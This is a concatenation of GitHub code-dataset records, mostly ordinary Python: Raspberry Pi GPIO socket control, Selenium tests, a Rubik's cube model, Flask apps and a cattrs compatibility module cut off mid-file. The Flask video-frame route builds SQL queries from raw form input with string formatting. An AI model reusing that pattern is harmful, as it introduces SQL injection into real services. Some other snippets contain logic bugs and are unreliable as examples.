control_data == b'start':\n s.send(b'start ok')\n\n\ndef end_led(control_data):\n control_data = b'null'\n print('end_led')\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect(('192.168.0.101', 7778))\n s.send(b'end_led_connect ok')\n while 1:\n control_data = s.recv(20)\n if control_data == b'end':\n s.send(b'end ok')\n\n\nif __name__ == \"__main__\":\n GPIO.setmode(GPIO.BCM) #BCM编号系统\n GPIO.setup(18, GPIO.OUT)\n GPIO.output(18,GPIO.HIGH)\n \n \n p1 = multiprocessing.Process(target = start_led, args = (control_data,))\n p2 = multiprocessing.Process(target = end_led, args = (control_data,))\n\n p1.start()\n p2.start()\n","repo_name":"hujiaodigua/rpi_gpio","sub_path":"test-pwm3_multiprocess.py","file_name":"test-pwm3_multiprocess.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23637878291","text":"import pytest\nfrom selenium import webdriver\nimport time\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\ndef test_basket(browser):\n browser.get(link)\n browser.implicitly_wait(15)\n text = browser.find_element_by_class_name(\"btn.btn-lg.btn-primary.btn-add-to-basket\").text\n time.sleep(15)\n assert bool(text) == True, \"Кнопка не найдена\"\n","repo_name":"FBernardeschi/stepik_test_of_language","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20316508393","text":"from sw_simulation import SWSimulation\n\nimport asyncio\nimport jax.numpy as jnp\n\ndef run_simulation(w0_mult):\n print(f'{w0_mult} started')\n sim = SWSimulation(w_0_mult=w0_mult)\n\n sim.run()\n print(f'{w0_mult} finished')\n\nasync def main():\n # asynchronously run the simulation for a range of w_0_mult values from 0.1 to 1.0\n w0_mult_range = [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]#[0.1, 0.3, 0.5,0.7,0.]#jnp.linspace(0.0, 1.0, num=20)\n tasks = await asyncio.gather(*[run_simulation(w0_mult) for w0_mult in w0_mult_range])\n print(tasks)\n\nif __name__ == '__main__':\n asyncio.run(main())","repo_name":"DaviAlefe/tcc-simulations","sub_path":"sw_runner.py","file_name":"sw_runner.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18502138357","text":"from collections import deque\n\ndef parse_board(board):\n parsed_board = [line.split() for line in board]\n return [[parse_square(square) for square in row] for row in parsed_board]\n\ndef parse_square(square):\n if square == \"Start\":\n return \"Start\"\n if square == \"End\":\n return \"End\"\n if square.startswith(\"S(\"):\n return -int(square[2:-1])\n if square.startswith(\"L(\"):\n return int(square[2:-1])\n return int(square)\n\ndef possible_to_reach_end(board, die_inputs):\n board = parse_board(board)\n start, end = 1, 100\n visited = [False] * 101\n visited[start] = True\n queue = deque([(start, 0, 0, 0)]) # (position, snakes, ladders, moves)\n\n while queue:\n position, snakes, ladders, moves = queue.popleft()\n\n if position == end:\n return f\"Possible {snakes} {ladders}\"\n\n for die in die_inputs:\n for _ in range(die): # Iterate over each possible roll of the die\n new_position = position + 1\n if 1 <= new_position <= 100 and not visited[new_position]:\n visited[new_position] = True\n next_square = board[new_position - 1] # Adjust for 0-based indexing\n if next_square == \"Start\":\n next_square = 1\n if next_square == \"End\":\n next_square = 100\n if isinstance(next_square, int):\n queue.append((next_square, snakes, ladders, moves + 1))\n elif isinstance(next_square, list) and next_square[0] < 0:\n snakes += 1\n elif isinstance(next_square, list) and next_square[0] > 0:\n ladders += 1\n\n return f\"Not possible {snakes} {ladders}\"\n\n# Input\nboard = [\n \"End 99 98 S(7) 96 95 94 93 92 91\",\n \"81 82 L(99) 84 85 86 87 88 89 90\",\n \"80 79 78 77 76 75 74 73 72 71\",\n \"61 62 S(22) 64 65 66 67 68 69 70\",\n \"60 59 58 S(14) 56 57 54 53 52 51\",\n \"41 42 43 44 45 46 L(80) 48 49 50\",\n \"40 39 38 37 36 35 34 33 32 31\",\n \"21 22 23 L(63) 25 26 27 28 29 30\",\n \"20 19 S(2) 17 16 15 14 13 12 11\",\n \"Start 2 3 4 5 6 7 8 9 10\"\n]\n\ndie_inputs = [5, 4, 2, 4, 1]\n\n# Output\nresult = possible_to_reach_end(board, die_inputs)\nprint(result)\n","repo_name":"Prangyajyotidakua/python","sub_path":"tcscodevita/soluB_2.py","file_name":"soluB_2.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71376595650","text":"import cv2 \nimport os \nfrom config import DIR\nfrom models import db_file\nfrom app import app\nfrom flask import request\nfrom .database import insert_file,insert_folder\n\n# outPutDir 视频路径 videoName 视频名字 \ndef get_frame_name(outPutDir, videoName, times):\n #命名视频帧\n n = len(videoName)\n # '0'*(3-n) 表示有几个0\n videoName = '0'*(3-n) + videoName\n n = len(str(times))\n times = '0'*(4-n) + times\n # filename 视频帧名字\n # /data/dataset/zsh/videos/label_data/images/17(1)0001.jpg\n filename = outPutDir + videoName + times + '.jpg'\n # 服务器存放图片的路径,图片名字无后缀:17(1)0001\n return [filename,videoName+times]\n\n# 提取视频帧,并且保存到指定文件里\n# videopath 视频文件路径,/zsh/videos/\n# videoName 视频名字,17(1)\n# outPutDir 视频文件抽帧后图片存放路径,/zsh/videos/label_data/images/\n# fileurl 从数据库拿到的服务器存放视频的路径,/data/dataset/yd_pose/dance/k-pop/maria/ori_data/round_1/videos/17.mp4\n# frame_cnt 表单数据,无\ndef get_frame(videoPath, videoName, outPutDir, fileurl, frame_cnt):\n #要提取视频的文件名\n sourceFileName=videoName\n #把后缀接上,服务器存放视频的路径\n # /data/dataset/zsh/videos/17.mp4\n video_path = DIR + videoPath + sourceFileName+'.mp4'\n print(video_path)\n # 计数用,多少帧截一张\n times=0\n #输出图片到当前目录vedio文件夹下\n # os.path.exists 文件夹存在返回True,反之返回false\n # /data/dataset/zsh/videos/label_data/images/\n if not os.path.exists(DIR+outPutDir):\n #如果文件目录不存在则创建目录\n # os.makedirs 递归生成文件夹,用来创建多层目录(单层用os.mkdir)\n # /data/dataset/zsh/videos/label_data/images/\n os.makedirs(DIR+outPutDir)\n # 插入文件夹,outPutDir[:-18]:文件名字,'label_data':文件路径\n # 把数据插入数据库\n insert_folder(outPutDir[:-18], 'label_data')\n insert_folder(outPutDir[:-7],outPutDir[-7:-1])\n # n 给视频帧命名用的\n n = 1\n # cv2.VideoCapture() 视频抽帧,视频图像化\n camera = cv2.VideoCapture(fileurl)\n # 获取视频的帧率\n fps = camera.get(cv2.CAP_PROP_FPS)\n #提取视频的频率,每50帧提取一个\n if frame_cnt:\n frameFrequency=int(frame_cnt)\n else:\n frameFrequency=int(fps)\n print(frameFrequency)\n print(frame_cnt)\n # 取出所有的图片和图片名字并且存放进数据库\n while True:\n # 取帧,从1开始\n times+=1\n # read() 读取名字和图片\n res, image = camera.read()\n print(res)\n # 判断res是否为None\n if not res:\n print('not res , not image')\n break\n # 每50帧提取一个,times从1-50,51取模不等于0\n if times%frameFrequency==0:\n # get_frame_name() 命名视频帧\n # /data/dataset/zsh/videos/label_data/images/\n # 服务器存放图片路径,视频名字,计数n\n res = get_frame_name(DIR+outPutDir, videoName, str(n))\n # res:服务器存放图片的路径,图片名字无后缀:17(1)0001\n n += 1\n # 取出视频帧路径,有名字后缀\n # /data/dataset/zsh/videos/label_data/images/17(1)0001.jpg\n filename = res[0]\n # 取出加上数字后的视频名字,,无后缀\n # 17(1)0001\n name = res[1]\n print(filename)\n print(name)\n # cv2.imwrite() 用于将图像保存到指定的文件,视频帧和视频帧对应的图片,\n # filename:要保存的文件的路径和名称,image:保存的图片\n cv2.imwrite(filename, image)\n sql = '''select * from userfile where filePath=\"{}\" and fileName=\"{}\"'''.format(outPutDir, name)\n # 判断是否从数据库拿到数据,db_file(sql) 从数据库拿数据\n if not db_file(sql):\n insert_file(outPutDir, name,'jpg')\n print('图片提取结束')\n # 释放资源\n camera.release()\n\n# #获取视频文件信息\ndef get_video_info(userFileIds):\n #获取视频文件信息\n sql = '''select fileName,filePath,extendName,fileId from userfile where userFileId in ({})'''.format(userFileIds)\n print(sql)\n #数据库操作\n result = db_file(sql)\n # 空列表\n videopath = []\n videolist = []\n videoextend = []\n videofileid = []\n for res in result:\n # 视频文件路径\n # 列表中添加数据\n videopath.append(res['filePath'])# /zsh/videos/\n # 视频文件名字\n videolist.append(res['fileName'])# 17(1)\n # lower() 大写字母转小写\n videoextend.append(res['extendName'].lower())#mp4\n videofileid.append(res['fileId'])#10161\n print(videopath)\n print(videoextend)\n # set() 转成一个集合{}\n videopath = set(videopath)\n videoextend = set(videoextend)\n # 判断视频文件路径是否存在\n if len(videopath) != 1:\n return 0\n # 判断视频文件名字是否存在 \n elif len(videoextend) != 1:\n return 1\n # list(videopath)[0] 视频文件路径集合中的第一个,/zsh/videos/\n # list(videoextend)[0] 视频文件名字后缀的第一个,mp4\n # videolist 存放视频文件名字的集合,17(1)\n # videofileid 视频文件Id,10161\n res = [list(videopath)[0], list(videoextend)[0], videolist, videofileid]\n return res\n\n# 批量抽取视频帧\n# 装饰器@ methods=['POST'] 代表这个url地址允许POST请求方式\n# post 客户端使用响应码来确定应用程序的操作是否成功\n# 通过route()装饰器的方法将函数连接到请求的URL上 ’/get_video_frame‘\n@app.route('/get_video_frame', methods=['POST'])\ndef get_video_frame():\n # 定义一个空字典\n resp = {}\n # 执行正确,后面碰到错误就之后退出\n resp['code'] = 0\n resp['msg'] = 'ok'\n # Request.Form:获取以POST方式提交的数据\n # request.form['userFileIds'] 获取表单中userFileIds对应的值\n userFileIds = request.form['userFileIds']\n frame_cnt = ''\n # 判断'frame_cnt'是否在表单中\n if 'frame_cnt' in request.form:\n # 如果存在就取出对应的值\n frame_cnt = request.form['frame_cnt']\n print(userFileIds)\n # get_video_info() 从数据库中取出视频文件的数据:\n # 没有取到数据就是0或1\n # 路径,后缀,名字,fileId\n video_info = get_video_info(userFileIds)\n # ==0:视频文件路径错误,==1:视频文件类型错误\n if video_info == 0:\n # 执行出错\n resp['code'] = 1\n # 视频路径错误\n resp['msg'] = 'Video Path Error'\n return resp\n elif video_info == 1:\n # 执行出错\n resp['code'] = 1\n # 视频类型错误\n resp['msg'] = 'Video Type Error'\n return resp \n # 视频文件路径\n videopath = video_info[0]# 路径 /zsh/videos/\n # 视频文件名字\n videolist = video_info[2]# 名字 17\n # 视频文件对应的fileId\n videofileid = video_info[3]# fileId 10161\n print(videopath)\n print(videolist)\n # 字符串切片判断路径是否是指定路径,否:文件路径错误\n # 当前路径是否是/videos/\n if videopath[-8:] != '/videos/':\n # 执行出错\n resp['code'] = 1\n # 视频路径错误\n resp['msg'] = 'Video Path Error'\n # 返回退出\n return resp\n # 如果是指定路径就在后面加上新路径拼凑成完整路径\n # outPutDir 视频抽帧后图片存放位置\n # /zsh/label_data/images/\n outPutDir=videopath[:-7]+'label_data/images/'\n # 视频文件名字长度\n n = len(videolist)\n # 视频名字对应的下标\n for i in range(n):\n # 循环把视频名字一个一个赋值过去\n video = videolist[i] # 17(1)\n # fileId \n fileid = videofileid[i] # 10161\n # 数据库查询id\n sql = '''select fileUrl from file where fileId={}'''.format(fileid)\n # 拿到的所有数据的第一条中和’fileUrl‘对应的数据\n #yd_pose/dance/k-pop/maria/ori_data/round_1/videos/17.mp4\n fileurl = db_file(sql)[0]['fileUrl'] \n # 把根目录路径加上,完整路径,服务器储存视频的绝对路径\n # /data/dataset/yd_pose/dance/k-pop/maria/ori_data/round_1/videos/17.mp4\n fileurl = DIR + '/' + fileurl\n # videopath 视频路径,/zsh/videos/\n # video 视频名字,17\n # outPutDir 视频文件抽帧后图片存放路径,/zsh/videos/label_data/images/\n # fileUrl 从数据库拿到的需要抽帧视频的路径,在服务器里,\n # /data/dataset/yd_pose/dance/k-pop/maria/ori_data/round_1/videos/17.mp4\n # frame_cnt 表单数据,无\n # 提取视频帧,并且保存到指定文件里\n get_frame(videopath, video, outPutDir, fileurl, frame_cnt)\n # 返回集合,里面存放code,msg,是否正确\n return resp","repo_name":"zsh123abc/python_flask","sub_path":"views/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":9183,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21110895099","text":"from selenium import webdriver\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\ndriver = webdriver.Chrome()\r\ndriver.get('https://www.baidu.com')\r\ndriver.maximize_window()\r\nsleep(2)\r\n\r\n# 在Selenium中将鼠标键盘操作封装在 ActionChains 类中\r\n\r\n# 定位到 \"设置\" 标签\r\nelement = driver.find_element_by_xpath('//*[@id=\"s-usersetting-top\"]')\r\n\r\n# 创建一个鼠标操作的对象 [tʃeɪnz]\r\n# mouse = ActionChains(driver)\r\n\r\n# 主要操作:\r\n# click(on_element=None) # 鼠标单击。适用于链接、选框等元素。\r\n# click_and_hold(on_element=None) # 鼠标单击并且按住部分\r\n# double_click(on_element=None) # 鼠标双击\r\n# context_click(on_element=None) # 鼠标右击\r\n# drag_and_drop(source, target) # 鼠标拖拽\r\n# drag_and_drop_by_offset(source, xoffset, yoffset) # 将目标拖拽到目标位置\r\n# key_down(value, element=None) # 按下某个键,实现快捷键操作\r\n# key_up(value, element=None) # 松下某个键,一般和key_down操作一起使用\r\n# move_to_element(to_element) # 移动到指定元素\r\n# move_to_element_with_offset(to_element, xoffset, yoffset) # 移动鼠标到指定坐标\r\n# release(on_element=None) # 释放按下的鼠标\r\n# perform() # 将之前一系列的ActionChains执行\r\n\r\n# 鼠标移动到\"设置\",并悬停\r\nActionChains(driver).move_to_element(element).perform()\r\nsleep(1)\r\n\r\n# 鼠标悬停时,定位元素,超链接\"搜索设置\",然后实现单击操作\r\ndriver.find_element_by_link_text(\"搜索设置\").click()\r\n\r\ndriver.refresh()\r\n\r\n# 鼠标在指定元素上右键1\r\nelement2 = driver.find_element_by_xpath('//*[@id=\"s_lg_img\"]') # 百度logo图片\r\nsleep(1)\r\nActionChains(driver).context_click(element2).perform()\r\n\r\n# 鼠标在指定元素上右键2\r\n# ActionChains(driver).context_click(element).send_keys(Keys.ARROW_DOWN).send_keys(Keys.ENTER).perform()\r\n\r\nsleep(1)\r\ndriver.quit()\r\n","repo_name":"holmes-tao/test","sub_path":"第3章_常用API操作_A/04_常用API操作_鼠标单击、悬停操作.py","file_name":"04_常用API操作_鼠标单击、悬停操作.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18418527781","text":"#!/usr/bin/env python\n\n\"\"\"\nN x N x N Rubik's Cube\n\"\"\"\n\n__author__ = \"Edwin J. Son \"\n__version__ = \"0.0.1a\"\n__date__ = \"May 27 2017\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass cube:\n colors = ('white', 'yellow', 'orange', 'red', 'skyblue', 'blue')\n faces = ('front', 'back', 'left', 'right', 'top', 'bottom')\n def __init__(self, n_shuffle=50, size=3):\n self.size = size\n self.face_dic = {self.faces[i]:i for i in range(len(self.faces))}\n self.data = np.ones((len(self.faces), size, size),dtype='int') * np.arange(len(self.faces)).reshape((len(self.faces), 1, 1))\n self.shuffle(n_shuffle)\n return\n def shuffle(self, n_shuffle=20):\n if n_shuffle < 1:\n n_shuffle = 20\n for i in range(n_shuffle):\n ridx = np.random.randint(2)\n fidx = np.random.randint(len(self.faces))\n lidx = np.random.randint((self.size + 1) // 2)\n if ridx == 0:\n self.clockwise(self.faces[fidx], lidx)\n else:\n self.cntclkwise(self.faces[fidx], lidx)\n return\n def clockwise(self, face='front', level=0):\n if face not in self.faces:\n raise RuntimeError('\"{}\" is not in self.faces'.format(face))\n if level < 0:\n l = 0\n elif level < self.size:\n l = level\n else:\n l = self.size - 1\n il = self.size - 1 - l\n if (self.face_dic[face] % 2) == 0:\n fidx = (self.face_dic[face] + np.arange(len(self.faces))) % len(self.faces)\n else:\n fidx = (self.face_dic[face] + np.arange(len(self.faces),0,-1)) % len(self.faces)\n if l == 0:\n self.data[fidx[0],:,:] = self.data[fidx[0],::-1,:].T\n elif l == self.size - 1:\n self.data[fidx[1],:,:] = self.data[fidx[1],:,::-1].T\n bak = self.data[fidx[2], :, il].copy()\n self.data[fidx[2], :, il] = self.data[fidx[5], ::-1, l]\n self.data[fidx[5], :, l] = self.data[fidx[3], il, :]\n self.data[fidx[3], il, :] = self.data[fidx[4], l, ::-1]\n self.data[fidx[4], l, :] = bak[:]\n return\n def cntclkwise(self, face='front', level=0):\n if face not in self.faces:\n raise RuntimeError('\"{}\" is not in self.faces'.format(face))\n if level < 0:\n l = 0\n elif level < self.size:\n l = level\n else:\n l = self.size - 1\n il = self.size - 1 - l\n if (self.face_dic[face] % 2) == 0:\n fidx = (self.face_dic[face] + np.arange(len(self.faces))) % len(self.faces)\n else:\n fidx = (self.face_dic[face] + np.arange(len(self.faces),0,-1)) % len(self.faces)\n if l == 0:\n self.data[fidx[0],:,:] = self.data[fidx[0],:,::-1].T\n elif l == self.size - 1:\n self.data[fidx[1],:,:] = self.data[fidx[1],::-1,:].T\n bak = self.data[fidx[2], ::-1, il].copy()\n self.data[fidx[2], :, il] = self.data[fidx[4], l, :]\n self.data[fidx[4], l, :] = self.data[fidx[3], il, ::-1]\n self.data[fidx[3], il, :] = self.data[fidx[5], :, l]\n self.data[fidx[5], :, l] = bak[:]\n return\n def display(self, face=None, lw=2, figsize=(6, 4), dpi=75):\n fig = plt.figure(figsize=figsize, dpi=dpi)\n X = np.linspace(0,1,10)\n Y, Z = np.meshgrid(X, X)\n X = np.zeros_like(Y)\n ax = [fig.add_subplot(2,3,i+1, projection='3d') for i in range(6)]\n ax[0].set_title('top')\n ax[1].set_title('top')\n ax[2].set_title('top')\n ax[3].set_title('left')\n ax[4].set_title('front')\n ax[5].set_title('right')\n for i in range(6):\n ax[i].set_xticks([])\n ax[i].set_yticks([])\n ax[i].set_zticks([])\n for i in range(self.size):\n ii = self.size - 1 - i\n for j in range(self.size):\n ij = self.size - 1 - j\n #c = self.colors[1+i+2*j]\n # front\n c = self.colors[self.data[self.face_dic['front'], i, j]]\n ax[0].plot_surface(X+self.size, Y+i, Z+j, color=c, lw=lw)\n ax[3].plot_surface(X+self.size, Y+j, Z+ii, color=c, lw=lw)\n ax[1].plot_surface(Y+i, X, Z+j, color=c, lw=lw)\n ax[4].plot_surface(Y+i, Z+j, X+self.size, color=c, lw=lw)\n # back\n c = self.colors[self.data[self.face_dic['back'], i, j]]\n ax[2].plot_surface(X+self.size, Y+ij, Z+i, color=c, lw=lw)\n ax[5].plot_surface(X+self.size, Y+i, Z+j, color=c, lw=lw)\n # left\n c = self.colors[self.data[self.face_dic['left'], i, j]]\n ax[0].plot_surface(Y+j, X, Z+ii, color=c, lw=lw)\n ax[3].plot_surface(Y+j, Z+ii, X+self.size, color=c, lw=lw)\n # right\n c = self.colors[self.data[self.face_dic['right'], i, j]]\n ax[1].plot_surface(X+self.size, Y+ii, Z+ij, color=c, lw=lw)\n ax[4].plot_surface(X+self.size, Y+ij, Z+i, color=c, lw=lw)\n ax[2].plot_surface(Y+ii, X, Z+ij, color=c, lw=lw)\n ax[5].plot_surface(Y+ii, Z+ij, X+self.size, color=c, lw=lw)\n # top\n c = self.colors[self.data[self.face_dic['top'], i, j]]\n ax[0].plot_surface(Y+ii, Z+ij, X+self.size, color=c, lw=lw)\n ax[1].plot_surface(Y+ij, Z+i, X+self.size, color=c, lw=lw)\n ax[2].plot_surface(Y+i, Z+j, X+self.size, color=c, lw=lw)\n # bottom\n c = self.colors[self.data[self.face_dic['bottom'], i, j]]\n ax[3].plot_surface(Y+ij, X, Z+i, color=c, lw=lw)\n ax[4].plot_surface(Y+ii, X, Z+ij, color=c, lw=lw)\n ax[5].plot_surface(Y+j, X, Z+ii, color=c, lw=lw)\n return\n","repo_name":"soneddy/pyrubiks","sub_path":"python/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35642471353","text":"import os\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Set Matplotlib font and style settings\nrc_fonts = {\n 'xtick.direction': 'in',\n 'ytick.direction': 'in',\n 'xtick.labelsize': 10,\n 'ytick.labelsize': 10,\n 'ytick.right': True,\n 'xtick.top': True,\n \"font.family\": \"times\",\n \"font.size\": 10,\n 'axes.titlesize': 10,\n \"legend.fontsize\": 10,\n # \"axes.spines.right\": False,\n # \"axes.spines.top\": False,\n # 'figure.figsize': (8, 3.5),\n}\nplt.rcParams.update(rc_fonts)\nplt.rc('axes', unicode_minus=False)\n\ndef get_results(algo_domain_path, metrics):\n res_dict = {}\n seeds = os.listdir(algo_domain_path)\n for seed in seeds:\n csv_path = os.path.join(algo_domain_path, seed, 'progress.csv')\n print('load file:', csv_path)\n data = np.genfromtxt(csv_path, delimiter=',', names=True, dtype=float)\n for metric in metrics:\n if metric in res_dict.keys():\n res_dict[metric].append(data[metric])\n else:\n res_dict[metric] = [data[metric]]\n for metric in metrics:\n min_row = min([len(col) for col in res_dict[metric]])\n clip_res = [col[0:min_row] for col in res_dict[metric]]\n res_dict[metric] = np.stack(clip_res, -1)\n return res_dict\n\ndef smooth_results(results, smoothing_window=100):\n smoothed = np.zeros_like(results)\n for idx in range(len(smoothed)):\n if idx == 0:\n smoothed[idx] = results[idx]\n continue\n start_idx = max(0, idx - smoothing_window)\n smoothed[idx] = np.mean(results[start_idx:idx], axis=0)\n return smoothed\n\ndef get_parsed_dict(paths):\n \"\"\"\n path format: .../task/algo/domain/seed/progress.csv\n input: paths is a list of mlutiple task paths\n \"\"\"\n domain_algo_plot = {} # dict for plotting figure\n algo_domain_path = {} # dict for loading data\n algos = [] # list for collecting all algo\n for path in paths:\n algos_ = os.listdir(path)\n algos.extend(algos_)\n for algo in algos_:\n domains = os.listdir(os.path.join(path, algo))\n for domain in domains:\n if domain not in domain_algo_plot.keys():\n domain_algo_plot[domain] = [algo]\n else:\n domain_algo_plot[domain].append(algo)\n assert algo + '-' + domain not in algo_domain_path.keys()\n algo_domain_path[algo + '-' + domain] = os.path.join(path, algo, domain)\n print('retrieved algos', algos)\n return domain_algo_plot, algo_domain_path, algos","repo_name":"raincchio/Make-Figure-For-Scientific-Paper","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"32371859180","text":"import math #brings in any math function that isn't included with python\r\nimport datetime\r\n\r\nrealNumber = 5.5555\r\nprint(round(realNumber,2))#rounds the number to 2 dp\r\nprint(math.trunc(realNumber))#rounds any real number down to the nearest whole number\r\nmultiply = 2*5#all variable names are how to perform each arithmetic function\r\ndivide = 2/5\r\nadd = 2 + 5\r\nsubtract = 2-5\r\nexponentiation = 2**5\r\nsquare_root = math.sqrt(25)\r\nmodulus = 5 % 2#gives the remainder which is 1\r\ndiv = 5//2#gives the maximum amount of times the whole number goes into the other. this gives 2\r\n\r\n\r\nstring = \"Hello World\"\r\nlen(string) #returns the length of the string\r\nprint(string[0:3])#returns the portion of the string within these indexes\r\nprint(string.find(\"Hel\"))#determines if \"Hel\" is contained within string and displays the index of where it starts\r\nprint(ord(\"a\"))#prints the ascii number of this character\r\nprint(chr(97))#prints the ascii character of this number\r\n\r\nint(\"1\")#converts the character \"1\" into an integer\r\nstr(123)#converts the integer 123 to a string\r\nfloat(\"123.456\")#converts the string into a real number\r\nstr(123.456)\r\n\r\nprint(datetime.date(2016,12,16))\r\n\r\nhello = \"hi\"#sets the string \"hi\" to the variable identifier hello\r\nbye = input()#sets whatever the user types in to the identifier bye\r\n\r\ntotalBill = int(input(\"What is the total of your bill?\"))\r\ntotalwithTip = totalBill * 1.1\r\nprint(\"Each person owes\",str(round(totalwithTip/10,2))+\".\")\r\n","repo_name":"ConnieLo/fundamentals","sub_path":"Programming Basics.py","file_name":"Programming Basics.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18916019071","text":"from flask import Flask,jsonify, render_template, request\nfrom Main import SudokuSolver\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'f2dc4afa20c6c6b4b7b0b63227fbf4d6'\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/solve', methods=['POST'])\ndef solve_sudoku():\n ss = SudokuSolver(request.form['input_string'])\n if not ss.check():\n return 'Invalid'\n else:\n return ss.toString(ss.search(ss.grid_values()))\n \n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=False, port=3000)\n","repo_name":"wnprince/sudoku-solving","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"72474027969","text":"import builtins\nimport sys\nfrom collections.abc import MutableSet as AbcMutableSet\nfrom collections.abc import Set as AbcSet\nfrom dataclasses import MISSING\nfrom dataclasses import fields as dataclass_fields\nfrom dataclasses import is_dataclass\nfrom typing import AbstractSet as TypingAbstractSet\nfrom typing import Any, Dict, FrozenSet, List\nfrom typing import Mapping as TypingMapping\nfrom typing import MutableMapping as TypingMutableMapping\nfrom typing import MutableSequence as TypingMutableSequence\nfrom typing import MutableSet as TypingMutableSet\nfrom typing import NewType, Optional\nfrom typing import Sequence as TypingSequence\nfrom typing import Set as TypingSet\nfrom typing import Tuple, get_type_hints\n\nfrom attr import NOTHING, Attribute, Factory\nfrom attr import fields as attrs_fields\nfrom attr import resolve_types\n\nversion_info = sys.version_info[0:3]\nis_py37 = version_info[:2] == (3, 7)\nis_py38 = version_info[:2] == (3, 8)\nis_py39_plus = version_info[:2] >= (3, 9)\nis_py310_plus = version_info[:2] >= (3, 10)\n\nif is_py37:\n\n def get_args(cl):\n return cl.__args__\n\n def get_origin(cl):\n return getattr(cl, \"__origin__\", None)\n\n from typing_extensions import Protocol\n\nelse:\n from typing import Protocol, get_args, get_origin # NOQA\n\nif \"ExceptionGroup\" not in dir(builtins):\n from exceptiongroup import ExceptionGroup\nelse:\n ExceptionGroup = ExceptionGroup\n\n\ndef has(cls):\n return hasattr(cls, \"__attrs_attrs__\") or hasattr(cls, \"__dataclass_fields__\")\n\n\ndef has_with_generic(cls):\n \"\"\"Test whether the class if a normal or generic attrs or dataclass.\"\"\"\n return has(cls) or has(get_origin(cls))\n\n\ndef fields(type):\n try:\n return type.__attrs_attrs__\n except AttributeError:\n try:\n return dataclass_fields(type)\n except AttributeError:\n raise Exception(\"Not an attrs or dataclass class.\")\n\n\ndef adapted_fields(cl) -> List[Attribute]:\n \"\"\"Return the attrs format of `fields()` for attrs and dataclasses.\"\"\"\n if is_dataclass(cl):\n attrs = dataclass_fields(cl)\n if any(isinstance(a.type, str) for a in attrs):\n # Do this conditionally in case `get_type_hints` fails, so\n # users can resolve on their own first.\n type_hints = get_type_hints(cl)\n else:\n type_hints = {}\n return [\n Attribute(\n attr.name,\n attr.default\n if attr.default is not MISSING\n else (\n Factory(attr.default_factory)\n if attr.default_factory is not MISSING\n else NOTHING\n ),\n None,\n True,\n None,\n True,\n attr.init,\n True,\n type=type_hints.get(attr.name, attr.type),\n )\n for attr in attrs\n ]\n else:\n attribs = attrs_fields(cl)\n if any(isinstance(a.type, str) for a in attribs):\n # PEP 563 annotations - need to be resolved.\n resolve_types(cl)\n attribs = attrs_fields(cl)\n return attribs\n\n\ndef is_hetero_tuple(type: Any) -> bool:\n origin = getattr(type, \"__origin__\", None)\n return origin is tuple and ... not in type.__args__\n\n\ndef is_protocol(type: Any) -> bool:\n return issubclass(type, Protocol) and getattr(type, \"_is_protocol\", False)\n\n\nOriginAbstractSet = AbcSet\nOriginMutableSet = AbcMutableSet\n\nif is_py37 or is_py38:\n Set = TypingSet\n AbstractSet = TypingAbstractSet\n MutableSet = TypingMutableSet\n\n Sequence = TypingSequence\n MutableSequence = TypingMutableSequence\n MutableMapping = TypingMutableMapping\n Mapping = TypingMapping\n FrozenSetSubscriptable = FrozenSet\n TupleSubscriptable = Tuple\n\n from collections import Counter as ColCounter\n from typing import Counter, Union, _GenericAlias\n\n def is_annotated(_):\n return False\n\n def is_tuple(type):\n return type in (Tuple, tuple) or (\n type.__class__ is _GenericAlias and issubclass(type.__origin__, Tuple)\n )\n\n def is_union_type(obj):\n return (\n obj is Union or isinstance(obj, _GenericAlias) and obj.__origin__ is Union\n )\n\n def get_newtype_base(typ: Any) -> Optional[type]:\n supertype = getattr(typ, \"__supertype__\", None)\n if (\n supertype is not None\n and getattr(typ, \"__qualname__\", \"\") == \"NewType..new_type\"\n and typ.__module__ in (\"typing\", \"typing_extensions\")\n ):\n return supertype\n return None\n\n def is_sequence(type: Any) -> bool:\n return type in (List, list, Tuple, tuple) or (\n type.__class__ is _GenericAlias\n and (\n type.__origin__ not in (Union, Tuple, tuple)\n and issubclass(type.__origin__, TypingSequence)\n )\n or (type.__origin__ in (Tuple, tuple) and type.__args__[1] is ...)\n )\n\n def is_mutable_set(type):\n return type is set or (\n type.__class__ is _GenericAlias and issubclass(type.__origin__, MutableSet)\n )\n\n def is_frozenset(type):\n return type is frozenset or (\n type.__class__ is _GenericAlias and 